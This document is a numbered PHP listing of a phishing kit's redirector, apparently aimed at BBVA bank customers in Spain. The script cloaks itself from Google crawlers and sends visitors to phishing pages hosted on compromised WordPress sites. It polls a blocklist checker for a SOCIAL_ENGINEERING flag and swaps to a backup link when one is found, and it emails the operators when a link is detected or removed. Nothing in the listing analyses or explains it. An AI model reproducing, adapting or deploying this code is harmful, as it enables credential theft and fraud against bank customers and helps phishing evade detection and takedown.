creative

1. error_reporting(0);
2. if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
3. if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
4. ########################################
5. $scam1 = 'https://eastsidesantorini.com/wp-admin/js/items/'; //http://oxaney.com
6. $scam2 = 'https://itbikes.ec/wp-content/plugins/items/';
7. ########################################
8. $aa = '0'; // Auto Redirecting
9. $gg = '0'; // check scam if you remove
10. $cc = '0'; // Random check flagged
11. $bb = '0'; // block all ip without spain
12. ########################################
13. $mail = "[email protected],[email protected]";
14. ########################################
15. $header = 'https://www.bbva.es/eng/particulares/index.jsp';
16. ########################################
17. include "antibots1.php";
18. include "antibots2.php";
19. include "antibots3.php";
20. function request($scam) {
21. $st = curl_init();
22. curl_setopt($st,CURLOPT_URL,'https://aw-snap.info/utilities/is-flagged.php?url='.base64_encode($scam).'%3D~enc');
23. curl_setopt($st, CURLOPT_RETURNTRANSFER, true);
24. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
25. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
26. $data = curl_exec($st); //print $data;
27. curl_close($st);
28. return $data;
29. }
30. function get($zaba) {
31. $st = curl_init();
32. curl_setopt($st,CURLOPT_URL,$zaba);
33. curl_setopt($st, CURLOPT_RETURNTRANSFER, true);
34. curl_setopt($st,CURLOPT_RETURNTRANSFER,1);
35. curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1);
36. $ok = curl_exec($st);
37. curl_close($st);
38. return $ok;
39. }
40. if($aa == 1 ){
41. if($bb == 1 ){
42. $ip  = getenv("REMOTE_ADDR"); #'91.142.217.133';
43. $ip_data = @json_decode(get("http://www.geoplugin.net/json.gp?ip=".$ip));
44. $dexter = $ip_data->geoplugin_countryCode;
45. if(!eregi("ES",$dexter)){
46. header("location: ".$header."");
47. break;
48. }  
49. }  
50. if($cc == 1 ){
51. if($gg == 1 ){
52. if(!file_exists("removed.txt")) {  
53. if(!preg_match_all('#1f3870be274f6c49b3e31a0c6728957f#',get($scam1."/robots.txt"))){
54. mail($mail,"Report Removed - ".rand(),"link it's removed in the time ".date("h:i:sa"));
55. fopen("removed.txt", "ab");
56. header("location: $scam2");
57. break;
58. }
59. }
60. else{
61. header("location: $scam2");
62. break;     
63. }
64. }
65. if(!file_exists("detected.txt")) {
66. if(rand(1, 4) == 2 ){
67. if(preg_match_all('#<strong>NOT</strong> currently flagged.</p>#',request($scam1))){
68. header("location: $scam1");
69. }
70. elseif(preg_match_all('#<strong>SOCIAL_ENGINEERING</strong>#',request($scam1))){
71. mail($mail,"Report Phishing - ".rand(),"link deceptive in the time ".date("h:i:sa"));
72. fopen("detected.txt", "ab");
73. header("location: $scam2");
74. }
75. }  
76. else{
77. header("location: $scam1");    
78. }
79. }
80. else{
81. header("location: $scam2");    
82. }
83. break;
84. }
85. ##########
86. if($gg == 1 ){
87. if(!file_exists("removed.txt")) {  
88. if(!preg_match_all('#1f3870be274f6c49b3e31a0c6728957f#',get($scam1."/robots.txt"))){
89. mail($mail,"Report Removed - ".rand(),"link it's removed in the time ".date("h:i:sa"));
90. fopen("removed.txt", "ab");
91. header("location: $scam2");
92. break;
93. }
94. }
95. else{
96. header("location: $scam2");
97. break; 
98. }
99. }
100. if(!file_exists("detected.txt")) {
101. if(preg_match_all('#<strong>NOT</strong> currently flagged.</p>#',request($scam1))){
102. header("location: $scam1");
103. }
104. elseif(preg_match_all('#<strong>SOCIAL_ENGINEERING</strong>#',request($scam1))){
105. mail($mail,"Report Phishing - ".rand(),"link deceptive in the time ".date("h:i:sa"));
106. fopen("detected.txt", "ab");
107. header("location: $scam2");
108. }
109. }
110. else{
111. header("location: $scam2");    
112. }
113. }
114. else{
115. header("location: $scam2");
116. }